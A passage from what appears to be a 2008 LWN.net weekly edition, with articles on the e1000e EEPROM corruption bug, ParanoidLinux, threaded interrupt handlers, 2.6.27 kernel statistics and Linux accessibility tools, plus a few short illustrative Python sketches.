Building the newest version of LAME on an Ubuntu 8.04.1 LTS (Hardy Heron)
i386 system was straightforward.  An older Ubuntu package of LAME was
first removed from the system using the Synaptic package manager.
The LAME version 3.98.2 source code was downloaded, unzipped, and untarred.
The configure script was run; no missing dependencies were found.  The
usual make and make install steps were done.  A few test case .wav files
were encoded with the command lame file.wav file.mp3, and the resulting
files were played with the SoX play command as well as the closed-source
RealPlayer application.  Everything worked as expected, and sounded as good
as one can expect for an MP3 file.


Overall, the latest changes to LAME fall into the category of
maintenance or the addition of mostly user-transparent features.
It is good news that this important piece of software
is going into another phase of active development.


		The CME Group sees a future with the Linux Foundation


The Linux Foundation has another new organization on the membership
roster this week. The CME Group announced it has joined the nonprofit
organization, and its associate director, Vinod Kutty, will chair the
Foundation's End User Council. The CME Group is made up of three
derivatives, or futures, exchanges: the Chicago Board of Trade, and the New
York and Chicago Mercantile Exchanges. Linux has played a major part in the
financial services industry for many years, and representatives of the CME
Group say it's time to become more involved in the evolution of open source
technology.

In a prepared statement, Kevin Kometer, Managing Director and Chief
Information Officer of CME Group, says, "Our Linux Foundation membership
allows us to move beyond just being users of Linux to being participants in
the direction of this important technology. Joining the Linux Foundation
and being deeply involved in Linux will also help the exchange determine
the future use of our own technology."

Practically speaking, the move will increase the Group's input into the
development of software for the financial industry, thereby giving them a
boost in a very competitive global marketplace.

Kutty explains, "By most accounts, derivatives exchanges around the
world do not compete with one another. Unlike the securities markets that
compete for listings, the majority of derivatives products are created with
intellectual capital or they are licensed products. Our main competition
comes in the form of the over-the-counter (OTC) marketplace where 80% of the
world's derivatives trade; only 20% of derivatives globally trade on an
exchange. The OTC products often are similar or lookalike products to what
an exchange would trade."

That competitive threat is a chief reason the CME Group chose to join
the Linux Foundation.

"We're excited to see CME join, but not surprised at its intent," says
Amanda McPherson, the Linux Foundation's VP of marketing and developer
programs. "CME realizes that direct collaboration with the Linux community
gives them a competitive advantage. They have bet their business on Linux
to very good effect. We're seeing the innovators and leaders understand
that to get the most of Linux it's important to collaborate with the
community directly. Through our end user council and the yearly
Collaboration Summits, companies like CME can collaborate closely with the
brightest minds in Linux."

While it's unusual for large financial exchanges to sit down with kernel
developers, it's not unheard of. Head Bubba, IT manager for the
international financial services group Credit Suisse, was part of a panel
that met with developers at last year's Kernel Summit to talk about the
challenges companies face when using Linux.

Kutty will be picking up where Bubba left off.  After attending this
year's Kernel Summit, Kutty is slated to speak on behalf of the CME Group
at the Linux Foundation's End User Summit in New York in October, where
he'll be talking about how the exchange has deployed Linux and where he
hopes to see it go in the future.

Historically, financial transactions have taken place on an exchange's
trading floor in a process known as "open outcry." This method is
increasingly being replaced by electronic trading, however, and the
financial industry appears to be ready to embrace open source technology in
the process.

McPherson says, "the NYSE and most bank's trading systems are based on
Linux. We're entering a third phase of adoption by financial services and
Linux. At first it was just small, skunk works projects. Then it moved into
broad-based adoption through vendors. Now we're seeing companies getting
the most out of their investment by partnering directly with the
community."

As a means to that end, Kutty will work with members of the End User
Council, Linux vendors, and leaders within the Linux community to
collaborate on technical and legal issues that affect FOSS. The CME Group
has relied on Linux since 2003 and, though it employs a variety of
commercial and open source tools, Linux remains the dominant technology in
use today. Kutty describes what they hope to accomplish:

The open source solutions tend to address some niches at the web tier
as well as scripting tools, performance monitoring tools, log file
analysis, development tools and simple document/content management.

Additionally, many of the GNU tools that are bundled with our Linux
distribution are taken for granted as being available for use on any system
we deploy, typically by our sysadmins as part of day-to-day
operations. Some pre-date our migration to Linux because it was and is
possible to use GNU tools on commercial UNIX. As open source alternatives
to commercial products mature, we evaluate them and select them if they
make sense. We're trying to play a more active role in the evolution of
these products higher up the stack than the OS, but our initial priority is
to focus on Linux improvements.

Given the current state of the economy in the US, any small advantage
for the financial industry is
welcome. McPherson says Linux and open source technology can certainly help
play a role in fixing what's broken. "The great thing about Linux is it's
open and gives customers a great deal of flexibility in working with their
vendors. It runs on multiple architectures and you can get support from
various vendors (or not pay for support at all). This will become more and
more appealing in our current economic environment. But given the
collaborative development model, Linux thrives in any economic environment
because of the choice it provides."

		The state of the e1000e bug


Linus Torvalds sent out the 2.6.27-rc8 release on September 29 with
this comment:


	This one should be the last one: we're certainly not running out of
	regressions, but at the same time, at some point I just have to
	pick some point, and on the whole the regressions don't look _too_
	scary.


This assertion raised a few eyebrows among those who are nervously watching
the e1000e corruption bug.  While the development community disagrees on
all kinds of issues, there is a reasonably strong consensus that
hardware-destroying bugs can be seen as "scary."

Given that, it would be nice to say that this particular regression has
been tracked down and fixed, but that is not the case.  As of this writing,
nobody knows what is causing systems with 2.6.27-rc kernels to occasionally
overwrite the EEPROM on e1000e network adapters.  The progress which has been
made, while discouragingly small, does narrow down the problem a bit:


 There was an early hypothesis that the GEM graphical memory manager
     code might be responsible for the problem.  There have been reports of
     corruption on distributions which do not package GEM, though, so GEM
     is no longer a suspect.

 For similar reasons, the idea that the page attribute table (PAT) work
     could somehow be responsible has been discarded.

 There has been a strong correlation between corrupted hardware and the
     presence of Intel graphics hardware.  That has led to a lot of
     speculation that the X.org Intel driver may somehow be doing the actual
     corruption, though a separate bug in the e1000e driver may be enabling
     that to happen.  But there is now a report of corruption with a system
     running NVIDIA graphics.  If that report is truly the same problem,
     then the X.org hypothesis will be substantially weakened.  (As an
     aside, it's worth pondering what would have happened if NVIDIA users
     had reported the problem first; the temptation to blame the
     proprietary NVIDIA driver could have been strong enough to delay
     action on the bug for some time).


So the signs point toward a problem localized within the e1000e driver, but
it is too early to draw that conclusion.  This bug remains mysterious, and
it could turn out to have surprising origins.

The nature of this bug makes it harder than usual to track down.  It seems
to be dependent on some sort of race condition, so it is hard to
reproduce.  But the way in which the bug makes itself known has the effect
of greatly reducing the number of testers trying to reproduce it.  People
who can avoid that combination of software are doing so, and distributors
shipping development kernels have disabled the e1000e driver.  Dave
Airlie's approach:


	But I'm leaving this up to Intel, I don't think HP will take it too
	kindly if I keep returning my laptop.


must be fairly typical.

One gets the sense that a fairly hot fire has been ignited underneath a
number of posteriors at Intel; its developers are active in the discussion
and clearly want to get this one solved.  One objective has been the
creation of a utility which would return corrupted hardware to a
functioning state, but that tool has been slow in coming.  Restoring
trashed e1000e adapters appears to be a hard problem, but this is one that
Intel has to get right.  If more testers are to be encouraged to risk
corruption with the idea that the recovery tool will fix them up again,
that tool needs to actually work when the time comes.  So it is hard to
blame Intel for taking the time to ensure that the recovery tool will do
its job, but, in the meantime, its absence is making testing harder.

Frans Pop raised an interesting long-term
concern: even if this bug is fixed tomorrow, it will be present in most of
the 2.6.27 history.  Anybody bisecting the kernel in an attempt to track
down an unrelated bug risks being bitten by a zombie version of the e1000e
bug.  There may be no way to deal with that threat other than the posting
of some big warnings.  Rewriting the bug out of the mainline repository's
history is possible with git, but it would create disruption for everybody
working from a clone of the repository.

Meanwhile, there could be some interesting consequences if the resolution
of this 
problem takes much more time.  It is hard to imagine that the 2.6.27
kernel could be released with a regression of this magnitude; let us say
that the reaction in the mainstream press would not be kind.  A 2.6.27
delay could force delays in a number of upcoming distribution releases.
This kind of cascading delay would not look good; it would, instead, be
reminiscent of the troubles encountered by certain proprietary software
companies.

That said, the system is clearly working.  Testers found the problem before
the code was released in anything resembling a stable form.  Developers are
now chasing after the bug as quickly as they can.  There will be no stable
kernel or distribution releases which corrupt hardware.  This situation is
a pain, but it will soon be resolved and forgotten.

		ParanoidLinux: from fiction to reality


A novel for young adults by Cory Doctorow has inspired the creation of a
new Linux distribution focused on privacy.  ParanoidLinux is still in the planning
stages, but it adopts some interesting ideas from Doctorow's book to place
atop a Debian Testing base.  It is targeted at those who have a very strict
need to disguise their documents and network traffic because of a
repressive regime. 


Doctorow is familiar to many in the free software world, for his work
as a science fiction author as well as a digital rights activist and
blogger.  His recent novel, Little Brother, is set
in the US after another devastating terrorist attack.  Because of the
attack, most civil liberties have been suspended, leading some characters to
use an alternative operating system:

ParanoidLinux is an operating system that assumes that its operator is
under assault from the government (it was intended for use by Chinese and
Syrian dissidents), and it does everything it can to keep your
communications and documents a secret. It even throws up a bunch of "chaff"
communications that are supposed to disguise the fact that you're doing
anything covert. So while you're receiving a political message one
character at a time, ParanoidLinux is pretending to surf the Web and fill
in questionnaires and flirt in chat-rooms. Meanwhile, one in every five
hundred characters you receive is your real message, a needle buried in a
huge haystack.


It is that description, along with others in the book, that is guiding the
development of the "real" ParanoidLinux.  While it is relatively easy to
come up with a fictional privacy-oriented operating system, the reality of
building one is rather challenging.  The project has only existed since
May, so the current focus is to get some kind of alpha system put together
as a starting point.


The idea of "chaff" is one that has been taken up on the ParanoidLinux
wiki.  There are several facets to the problem: how does one generate
normal-looking traffic while somehow transferring encrypted data as part of
that traffic?  There are existing techniques that could be used.  Chaff
combines the ideas of steganography (hiding even the existence of a
message) with cryptographic techniques.
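
As a rough illustration of the needle-in-a-haystack idea from the book, the
toy sketch below hides one real character in every five hundred characters
of filler.  It is not how ParanoidLinux implements chaff (the project is
still in the planning stages); the function names, the filler alphabet, and
the fixed stride are all assumptions made for this example.  A real design
would also have to encrypt the payload and make the filler look like
plausible traffic, neither of which is attempted here.

```python
import random
import string

STRIDE = 500  # one real character per 500, as in the book's description


def add_chaff(message, stride=STRIDE, rng=None):
    """Return a stream in which every stride-th character is a message character."""
    if rng is None:
        rng = random.Random()
    filler_alphabet = string.ascii_letters + string.digits + " "
    out = []
    for ch in message:
        # stride - 1 characters of random filler, then one real character
        out.extend(rng.choice(filler_alphabet) for _ in range(stride - 1))
        out.append(ch)
    return "".join(out)


def remove_chaff(stream, stride=STRIDE):
    """Recover the message by keeping only every stride-th character."""
    return stream[stride - 1::stride]
```

A fixed stride like this is trivially detectable by anybody who knows to
look for it, which is part of why the project describes chaff as a way to
fly under the radar rather than as protection against a targeted attack.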


The discussion about
chaff makes it clear that the ParanoidLinux developers are looking at
Doctorow's ideas carefully before implementing them.  Chaff is certainly
not a panacea, as it won't hide the traffic from an adversary that has
specifically targeted someone. It is, instead, a means to
fly under the radar, to appear to be a "normal" internet user with standard
traffic patterns.  


Using Tor (i.e. The Onion Router)
is one way to anonymously use the internet (within limits), but
traffic bound for a Tor node would be very suspicious to any monitoring
agency.  Another privacy-enhancing feature would be full-disk encryption,
but that would be yet another red flag for an agency that was inspecting
the computer.  These are the kinds of trade-offs that are being discussed by
the project as they try to narrow their focus to something that can be
implemented in the near term.


Hiding, or at least obfuscating, the existence of ParanoidLinux on the
computer is another piece of the puzzle.  It could be very dangerous to be
required by the authorities to boot one's ParanoidLinux laptop.  But, if it
appears to be a "regular" system—perhaps looking much like
Windows—it may escape scrutiny.  Encrypted data might then be stored on
partitions that are 
not directly accessible from the desktop.


This is an interesting project for those who worry about government
crackdowns or perhaps already live under a repressive regime.  Even if the
ParanoidLinux distribution does not meet one's needs, the various
discussions on options and different ways to approach a privacy-oriented
operating system will be useful.  One hopes not to ever need such a system,
but knowing that people are thinking about the problem—while generating
a working version—is certainly reassuring.  For that, we can thank
Doctorow for popularizing the idea.


		Some views from Vision


Your editor had the honor of speaking at MontaVista's Vision 2008 conference
recently.  This conference - a gathering of MontaVista's customers -
provided an opportunity to observe how (part of) the embedded industry sees
itself and its role in the larger Linux community.  Relations between
embedded systems and Linux as a whole have often been a little uneasy, a
situation which probably will not change in the near future.  That said,
there are signs that 
embedded developers are starting to think about the value of engaging more
directly with the development community that they depend on.


William Mills is the Chief Technologist for Open Linux Solutions at Texas
Instruments; his brief presentation at Vision was an interesting
demonstration of how attitudes in the industry are changing.  According to
Mr. Mills, TI's method for developing Linux drivers for its products
involved doing the work behind closed doors, then distributing the result
through MontaVista.  That approach has changed, though.  TI now does its
driver work in a public git tree, with a focus on merging the code upstream
as a first priority.  Customers who want to work directly with upstream
kernels can get the code directly.


In a sense, it would appear that TI has removed MontaVista as the
intermediary which distributes drivers for TI hardware.  But TI still
distributes code through MontaVista, so customers looking for a supported,
integrated offering can still get a distribution which suits their needs.
There's no shortage of embedded systems vendors who lack the skills and the
desire to support a Linux distribution themselves; for those vendors,
buying a supported system makes a lot of sense.  For everybody else, the
software is free and part of the mainline kernel, as it should be.


MontaVista founder Jim Ready discussed "the state of embedded Linux,"
focusing on areas where there is a bit of a mismatch between what the Linux
community is providing and what the embedded industry needs.  Certain kinds
of functionality are missing; the ability to do user-space interrupt
synchronization was one example.  The rate of change in the kernel is very
high, presenting embedded vendors with the difficult choice of backporting
fixes or upgrading to a more recent kernel.  Tracing and profiling tools
are not up to the level needed by the industry.


Jim also talked some about realtime functionality, which currently must be
patched into the kernel separately.  He complained that changes made to the
mainline kernel often break the realtime patch sets, leaving developers
scrambling to make things work again.  Keeping these patches in a working
state requires constant effort; it is a significant cost.


All of this may sound like whining from an industry which
has earned a reputation for taking more from Linux than it is willing to
put back in.  But Jim put the blame directly on the embedded industry
itself; embedded vendors, he says, still haven't quite gotten it.  While
taking some pride in MontaVista's position in the list of top contributors
to the kernel, he suggested that MontaVista should be enjoying the company
of more embedded systems firms.  The embedded industry should be
contributing more to the kernel than it is.


What it comes down to, says Jim, is that the center of gravity in the Linux
development world can be found in enterprise computing.  Vendors in that
industry are contributing heavily to the kernel and, as a result, the
kernel tends to fit their needs better.  The embedded community needs to
get together and figure out how it, too, can become a more prominent
contributor and work to drive the kernel in directions which suit its
needs.


Judging from the response in the room, many of those in the audience seemed
to agree with this point of view.  Some see it differently, though.  During
your editor's talk, a member of the audience asked whether the embedded
community should stop using a kernel developed by enterprise system vendors
and, instead, make its own version of the kernel suited to its needs.
Needless to say, your editor discouraged this approach; the cost of forking
the kernel and fragmenting the development community would vastly exceed
the value of any benefits gained.  But the questioner seemed unconvinced.


The clear conclusion to be drawn from that exchange is that there are still
people in the embedded industry who do not see the value of working with
the larger Linux development community.  It is easy to fault the embedded
community for its failure to contribute back, but it also makes sense to
look in the mirror and ask if we couldn't make a more persuasive case for
joining in.  There has been a sustained effort to encourage the embedded
systems industry to become a full participant in our community; over the
years, that work has yielded a steady stream of successes.  By continuing
and improving this work, we'll continue the process of bringing our
community together.  Then we'll truly have a single system that runs on
everything from wrist watches to supercomputers.

		Moving interrupts to threads


Processing interrupts from the hardware is a major source of latency in the
kernel, because other interrupts are blocked while doing that processing.
For this reason, the realtime tree has a feature, called threaded
interrupt handlers, that seeks to reduce the time spent with interrupts
disabled to a bare minimum—pushing the rest of the processing out
into kernel threads.  But it is not just realtime kernels that are
interested in lower latencies, so threaded handlers are being proposed for
addition to the mainline.  


Reducing latency in the kernel is one of the benefits, but there are other
advantages as well.  The biggest is probably 
reducing complexity by simplifying or avoiding locking between the "hard"
and "soft" parts 
of interrupt handling.  Threaded handlers will also help the
debuggability of the kernel and may eventually lead to the removal of tasklets from Linux.  For
these reasons, and a few others as well, Thomas Gleixner has posted a set of patches and a
"request for comments" to add threaded interrupt handlers.


Traditionally, interrupt handling has been done with a top half
(i.e. the "hard" irq) that actually responds to the hardware interrupt and
a bottom half (or "soft" irq) that is scheduled by the top half to do
additional processing.  The top half
executes with interrupts disabled, so it is imperative that it do as little
as possible to keep the system responsive.  Threaded
interrupt handlers reduce that work even
further, so the top half would consist of a "quick check handler" that just
ensures the interrupt is from the device; if so, it simply acknowledges the
interrupt to the 
hardware and tells the kernel to wake the interrupt handler thread. 


In the realtime tree, nearly all drivers were mass converted to use
threads, but the patch Gleixner proposes makes it optional—driver
maintainers can switch if they wish to.  Automatically converting drivers
is not necessarily popular with all maintainers, but it has an additional
downside as Gleixner notes: "Converting an interrupt to threaded
makes only sense when the handler 
code takes advantage of it by integrating tasklet/softirq
functionality and simplifying the locking."


A driver that wishes to request a threaded interrupt handler will call
request_threaded_irq().

This function is essentially the same as request_irq() with the addition of
the quick_check_handler.  As requested by Linus Torvalds at
this year's Kernel Summit, a new function was introduced rather than
changing countless drivers to use a new request_irq().


The quick_check_handler checks to see if the interrupt was from
the device, returning IRQ_NONE if it was not.  It can also return
IRQ_HANDLED if no further processing is required or
IRQ_WAKE_THREAD to wake the handler thread.  One other return code
was added to simplify converting to a threaded handler.  A
quick_check_handler can be developed prior to the 
handler being converted; in that case, it returns
IRQ_NEEDS_HANDLING (instead of IRQ_WAKE_THREAD) which
will call the handler in the usual way. 
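
The kernel interface itself is C, and the patch set should be consulted for
the real thing.  What follows is only a user-space model, written in Python,
of the return-code dispatch described above.  The four return codes come
from the proposal; the class and method names (ThreadedIrqModel, interrupt,
shutdown), the event dictionaries, and the shutdown marker are invented for
this illustration.

```python
import enum
import queue
import threading


class IrqReturn(enum.Enum):
    IRQ_NONE = 0            # interrupt was not from this device
    IRQ_HANDLED = 1         # no further processing is required
    IRQ_WAKE_THREAD = 2     # wake the handler thread
    IRQ_NEEDS_HANDLING = 3  # handler not converted yet: call it the usual way


class ThreadedIrqModel:
    """User-space stand-in for one interrupt line; this is not kernel code."""

    def __init__(self, quick_check_handler, handler):
        self.quick_check_handler = quick_check_handler
        self.handler = handler
        self._pending = queue.Queue()
        self._thread = threading.Thread(target=self._run, name="irq-thread")
        self._thread.start()

    def _run(self):
        # The handler thread sleeps until the quick check asks for it.
        while True:
            event = self._pending.get()
            if event is None:          # shutdown marker used by this model only
                return
            self.handler(event)

    def interrupt(self, event):
        """Model the arrival of one interrupt; return the quick check's verdict."""
        verdict = self.quick_check_handler(event)
        if verdict is IrqReturn.IRQ_WAKE_THREAD:
            self._pending.put(event)   # defer the real work to the thread
        elif verdict is IrqReturn.IRQ_NEEDS_HANDLING:
            self.handler(event)        # run the handler in the caller's context
        return verdict

    def shutdown(self):
        self._pending.put(None)
        self._thread.join()


def demo():
    """Deliver one interrupt per return code; report where each was handled."""
    handled_in = {}

    def quick_check(event):
        return event["verdict"]

    def handler(event):
        handled_in[event["id"]] = threading.current_thread().name

    irq = ThreadedIrqModel(quick_check, handler)
    for ident, verdict in enumerate(IrqReturn):
        irq.interrupt({"id": ident, "verdict": verdict})
    irq.shutdown()
    return handled_in
```

In this model, only the IRQ_WAKE_THREAD event ends up being processed in the
separate thread; the IRQ_NEEDS_HANDLING event is handled synchronously by the
caller, and the other two never reach the handler at all.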


request_threaded_irq() will create a thread for the interrupt and
put a pointer to it in the struct irqaction.  In addition, a
pointer to the struct irqaction has been added to the
task_struct so that handlers can check the action flags
for newly arrived interrupts.  That reference is also used to prevent
thread crashes from causing an oops. One
of the few complaints seen so far about the proposal was a concern about wasting four or eight bytes in each
task_struct that was not an interrupt handler (i.e. the vast
majority).  That structure could be split into two types, one for the
kernel and one for user space, but it is unclear whether that will be necessary.


Andi Kleen has a more general concern that threaded interrupt handlers will
lead to bad code: 
"to be 
honest my opinion is that it will encourage badly written interrupt 
code longer term," but he seems to be in the minority.  There were
relatively few comments, but most seemed in favor; perhaps many are
waiting to see the converted driver that Gleixner promises to deliver "real
soon".  If 
major obstacles don't materialize, one would guess the linux-next tree
would be a logical next step, possibly followed by mainline merging for 2.6.29.


		Some development statistics for 2.6.27


It's that time of the development cycle again: the 2.6.27 kernel, if not
yet released by the time you read this, will be shortly.  Various other LWN
articles have looked at features found in this release; here we will look
at where that code came from.

As of 2.6.27-rc9, a total of 10,604 non-merge changesets had been
added to the mainline for the 2.6.27 kernel; those patches added a total of
826,000 lines of code  while removing 608,000, for a net growth of 217,000
lines.  There were 1,109 developers who contributed to 2.6.27, representing
over 150 employers.  376 of those developers contributed a single patch
during this development cycle.

The most active developers for 2.6.27 were:


On the changeset side, Ingo Molnar ended up on top by virtue of the
creation of large numbers of mostly x86-related changes, including a big
subarchitecture reorganization; Ingo's count also includes the addition of
ftrace, though much of that code was written by others.  Bartlomiej
Zolnierkiewicz continues to rework the old IDE layer, and Adrian Bunk, as
always, energetically cleans up code all over the tree.  David Miller's total
includes the multiqueue networking code and a lot of other changes; Alan
Cox did a lot of TTY work and big kernel lock removal.

Your editor was disappointed to come in at #23, and, thus, off the bottom
of the table.  Time to send in some quick white space fixes.  More
seriously, though, it's worth noting that there are relatively few patches
of the "trivial change" variety in the mix this time around.


If we look at changed lines, Paul Mackerras comes out on top as the result
of a single patch removing the obsolete ppc architecture.
David Woodhouse reworked the management of firmware throughout the driver tree.
Jean-François Moine brought the GSPCA webcam drivers into the tree,
then put vast amounts of effort into cleaning them up.  Artem Bityutskiy
added the UBIFS flash filesystem, and Luis Rodriguez merged the ath9k
wireless driver.


If we look at the companies behind this work, we get the following results
(note that, as always, these results are somewhat approximate):


There are not too many surprises in this table - in particular, the list of
companies at the top tends not to change very much.  That said, a few
things are worthy of note.  One is that Sun Microsystems has made its first
appearance on this list.  People complain about this company, but Sun's
engineers have been quietly fixing things all over the tree.  Broadcom is
another company with a mixed reputation in the Linux community, but
Broadcom is happy to provide support for some of its network adapters.
Nokia's strong showing in the lines-changed table results primarily from the
contribution of the UBIFS filesystem.

The most welcome change, though, is the first appearance of Atheros on this
list.  Atheros is a company which has quickly moved from a position of
complete non-cooperation to one of supporting all of its hardware in the
mainline kernel.  To say that this is an encouraging development would be an
understatement. 

All told, the 2.6.27 development cycle shows that the process continues at
full pace in a seemingly healthy state.  Developers from all over the
industry are working together to make the kernel better for all.  The
number of companies which see participation in the process as being in
their interest is growing, as is the number of developers who contribute
patches.  The Linux kernel, it seems, is in good shape.

		Accessibility in Linux systems


The Linux kernel recently saw the addition of a "basic Braille screen reader",
and thus, the addition of a drivers/accessibility subdirectory and its
corresponding CONFIG_ACCESSIBILITY option.  It is worth noting that one of the
first reactions was "what the heck is accessibility?"  This shows how
unfamiliar the idea still is to developers.

And yet the issue of GNU/Linux accessibility, i.e. the usability of GNU/Linux
by disabled people (e.g. blind people) is, of course, not new. Work in that
area has been conducted for a long time: the speakup speech screen reader
saw its 0.07 version against Linux 2.2.7 in 1999, and the brltty Braille
screen 
reader started in 1995.  The basic Braille screen reader that has just been
added to the Linux kernel is only the visible part of work that has been
going on since then.

With the popularization of GNU/Linux among non-technical people, there has
been renewed interest in mainline accessibility support: the GNOME
desktop, 
OpenOffice.org and Firefox 3 can now be rendered via Braille and speech
synthesis thanks to the AT-SPI framework and the Orca screen reader.  KDE will
soon follow when these technologies get rebased on D-BUS.  In addition,
accessibility menus have
started appearing in the upstream distributions.

One of the main concerns
for disabled people used to be the lack of Javascript support in text-mode
web browsers and the lack of office suite support.  With more and more companies and
governments migrating to Linux—particularly since some states require
accessibility of tools used in government—renewed development effort
was becoming more and more of a must.  In Massachusetts, people had even signed
a petition against the migration to libre software because it was not yet
accessible at the time!

What is Accessibility?

Accessibility, sometimes abbreviated a11y, means making software usable by
disabled people.  That includes blind people of course, but also people who
have low vision, are deaf, colorblind, have only one hand, can move only a few
fingers, or even only the eyes.  It also includes people with (even mild)
cognitive difficulties or who are simply not familiar with the language.
Last but not least, it includes elderly people, who often have a bit of all
these disabilities.  Yes, that actually means everybody is concerned,
eventually.  Accessibility thus means support for special devices, but also
general care during development, like not assuming that an audible alarm
will be heard or a transient message will be read.

Perhaps one of the most obvious accessibility techniques is speech synthesis,
which turns text into audio that can be sent to speakers or headphones.  There
used to be hardware speech synthesizers (supported by the speakup drivers), but
these have often been replaced by software speech synthesis.  While the quality
of commercial software speech synthesis is very good these days, the quality
of free software varies a lot.  While there is very good libre English speech
synthesis, support for other languages is uneven.  For instance, the Festival
and eSpeak libre engines easily support a wide range of languages,
but their sound is rather robotic.  There are better phoneme libraries like
mbrola, but they are often not completely libre.  To better handle all these
potential speech synthesis backends, the speech dispatcher daemon takes care
of automatically choosing the appropriate synthesizer according to the desired
language and style.

Another very popular kind of device is Braille terminals.  These "show" text
by raising and lowering little pins which thus form Braille patterns.
Because their
cost is very high, a Braille terminal often has room for only 40 characters
or even 20 or 12. They integrate keys to navigate around the screen, so the
user ends up
reading it piece by piece.  Compared to speech synthesis, the reading accuracy
is far better, but not everybody can read Braille, and the cost remains very
high (on the order of $5,000).  The support of the various existing devices
is very 
good: both the brltty and suseblinux screen readers support a very wide range of
devices. 

Blind people will actually often use a combination of speech synthesis and
Braille devices.  As for other kinds of disabilities, the kinds of devices vary
a lot.  They range from joysticks (natively supported by X.org) to eye-tracking
systems (managed by dasher), via press buttons (supported by the GNOME Onscreen
Keyboard) or mere screen magnification (implemented by gnome-mag).


Everyday Use

The eternal Command Line Interface vs Graphical User Interface flamewar actually
also holds for people using a Braille terminal or speech synthesis.  The
contrast is perhaps even exacerbated by the inherent difficulties of performing
anything with a computer when disabled.

The old traditional way of using a GNU/Linux system, the text console, has
been working well with Braille devices and speech synthesis for a long time.
The principle is indeed quite simple: there are 25 lines
of 80 characters and text appears sequentially.  Screen readers for Braille
terminals would thus just automatically display what was last written and
permit the user
to navigate among these 25 lines.  Screen readers for speech synthesis (e.g.
speakup or yasr) would speak text as it appears on the screen, and have some
review facilities similar to what Braille screen readers have.  This works quite
well because applications are limited to the TTY interface; they cannot have
non-accessible fancy features such as graphical buttons.  Some applications may
still not be so easy to read, e.g. if they draw ASCII art or use colors to show
active buttons, but they often have options to make them more accessible; a
collection of tips can be found on this wiki.
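
The principle of reading an 80x25 text screen through a 40-cell Braille
display can be sketched as a small movable window.  This is a hypothetical
model for illustration only; it does not reflect how brltty or any other
screen reader is actually implemented, and the class and method names are
invented here.

```python
class BrailleWindow:
    """A movable window of `cells` characters over a text screen."""

    def __init__(self, screen_lines, cells=40, columns=80):
        # Pad or trim every line to the screen width so slices are uniform.
        self.lines = [line.ljust(columns)[:columns] for line in screen_lines]
        self.cells = cells
        self.columns = columns
        self.row = 0
        self.col = 0

    def visible(self):
        """Text currently shown on the Braille cells."""
        return self.lines[self.row][self.col:self.col + self.cells]

    def pan_right(self):
        # Move one window-width to the right unless already at the end.
        if self.col + self.cells < self.columns:
            self.col += self.cells
        return self.visible()

    def pan_left(self):
        self.col = max(0, self.col - self.cells)
        return self.visible()

    def line_down(self):
        if self.row + 1 < len(self.lines):
            self.row += 1
            self.col = 0
        return self.visible()

    def line_up(self):
        if self.row > 0:
            self.row -= 1
            self.col = 0
        return self.visible()

    def follow_output(self):
        """Jump to the last non-blank line, i.e. what was last written."""
        for index in range(len(self.lines) - 1, -1, -1):
            if self.lines[index].strip():
                self.row, self.col = index, 0
                break
        return self.visible()
```

With a 40-cell display, each 80-column line takes two window positions to
read, which is the "piece by piece" reading described earlier; a 20- or
12-cell display would simply be constructed with a smaller `cells` value.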

Accessibility of graphical desktops, on the other hand, is a quite recent matter,
in part because the issue is technically much harder: while applications on
the text console are limited to producing text, these days graphical
applications 
usually render text as bitmaps themselves, so that the textual information is
not available outside of the application for screen readers.  There have been
application adaptation attempts in the past (like ultrasonix), but they never
really got popular.  The GNOME project has been developing AT-SPI (Assistive
Technology Service Provider Interface) for the past decade, and that has become
really promising with the advent of the Orca screen reader.  AT-SPI can be 
understood as a protocol between screen readers (e.g. Orca) and applications.
To be "accessible", applications thus have to implement AT-SPI, or use a toolkit
that implements it (like GTK and soon Qt), so that screen readers can get the
logical and textual content of the application.  Orca is not yet as good as
what mature, proprietary Windows screen readers can achieve, but it is already
usable for everyday work.  It is progressing rapidly, notably thanks to the
support of Sun and the involvement of the Accessibility Free Software Group.  At the
time of writing, only GTK+ 2 (and thus the GNOME desktop and GTK+ 2
applications), Java/Swing, the Mozilla suite, OpenOffice.org, and Acrobat Reader
implement AT-SPI and thus are accessible.  Qt (and thus the KDE desktop) is
expected to support it once it gets rebased on D-BUS.  To get the best results,
the latest versions of applications should be used: for instance, Firefox is
really usable only starting from version 3.

Another approach is the use of self-reading applications.  For instance, Firevox
is a version of Firefox that integrates a dedicated screen reader.  That permits
a tighter interaction between the reader and the application, but
that is of course limited to that particular application.  Another example is
emacspeak, which is a vocalized version of emacs.  Some people simply use
emacspeak and nothing else, as emacs already meets all their needs.

All in all, as usual the mileage varies.  Some people will be very happy with
the mature, efficient screen reading of the text console, while other
people will 
consider that as a regression (like going back to DOS) and prefer using
intuitive environments such as the GNOME desktop, even if the Orca screen reader
is still quite young.  It is actually quite common to use both: for instance the
text console for the usual work, and the graphical environment for tasks that
require it, like browsing Javascript-powered websites or manipulating OpenOffice
documents.

Upstream Integration

Now, how can all of that be installed?  Most distributions already provide most
of the useful packages, but they often lack documentation on which tools are
useful according to the various disabilities.  The Linux Accessibility Resource
Site is a fairly complete source of information on the various tools that one
could use.  There is also a wiki page meant for administrators to get started
with accessibility needs.

A point worth noting, however, is that some distributions have accessibility
components built into their installation CDs.  For instance, starting from
Etch (aka Debian GNU/Linux 4.0), the Debian installer automatically detects
Braille terminals and, if one is found, switches to text mode, runs brltty, and
makes sure that brltty gets installed and configured on the target system.
Other distributions have often been unofficially adapted into so-called
"Braillified" installation images.  The very important point is that this
permits disabled people to be completely independent of the help of sighted
people, even when the (re)installation of a system has to be done!  That is
clearly one area in which Windows is far behind GNU/Linux achievements.

Future Challenges

To sum it up, "accessible" GNU/Linux is going through its democratization step
as well, just a bit shifted in time compared to the average Linux
democratization.  There are, of course, things that could be improved.  Even if
distributions usually contain accessibility software, it is hard for
accessibility newcomers to know which software will be useful for the various
kinds of disabilities users can have, so distributions will have to develop
wizards to help them.  In the meantime, websites such as the Linux
Accessibility Resource Site can be used as sources of information.  In any
case, discussion with the disabled users is essential to establish a suitable
solution (setting up Braille output would be useless if the user cannot read
Braille, for instance).

Beyond the mere use of GNU/Linux or its installation, one area that still is not
really accessible at all is the early stages of the boot process.  With future
development of the recently added basic Braille screen reader, the Linux kernel
should eventually be able to provide basic feedback even before user-space
screen reader daemons can be started from the hard disk.  Bootloaders like lilo
and grub are able to emit basic beeps, but being able to accurately edit the
kernel command line, for example, would require some support.  Last but not
least, tinkering with BIOS settings is currently possible for disabled people
only on high-end machines that can drive a serial console.  The democratization
of the EFI platform could be an opportunity to embed basic screen reading
functionalities.


[Samuel Thibault has been working on accessibility since 2002, when he and a
blind colleague designed the BrlAPI client/server Braille output engine, now
used by Orca for Braille support.  Since then he has worked on various
accessibility tasks, from the Debian installer support to Braille
